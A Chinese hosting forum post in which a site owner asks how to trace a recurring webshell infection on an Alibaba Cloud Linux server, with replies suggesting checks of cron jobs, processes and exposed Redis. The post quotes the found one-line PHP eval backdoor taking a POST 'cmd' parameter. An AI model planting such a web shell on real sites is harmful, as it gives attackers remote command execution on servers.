技术解析

服务器大神来支招,网站被挂马!
0
2021-06-29 05:21:40
idczone

网站隔几天就会在 web 的一些目录下生成垃圾.php 的脚本文件。比如最近的一个 php 文件:

< php ? php @ eval ( $_POST [ 'cmd ']) ; ? >

只有这么一句话的恶意脚本。

我的服务器在阿里云,也买了安骑士杀毒,但是只能检测到恶意脚本,并隔离,但具体这些脚本怎么生成的无法得知,因为隔离了,几天后又有新的垃圾脚本生成。也就是我的 linux 系统里是不是有后门,怎么揪出来? 还请各位服务器大神给点建议,指点迷津。


感谢这么多的中肯建议!

谢谢你的建议,wp 我也在用,感觉确实慢了一些。用到了缓存插件好了一点。

不给访问权限好像会把脚本下载回来

哥们,看看服务器有没有定时任务或者进程里有不正常的,另外,你没有装 Redis 吧?现在阿里云上装 redis 的中招的不少,被控挖矿的比较多。

数据地带为您的网站提供全球顶级IDC资源
在线咨询
专属客服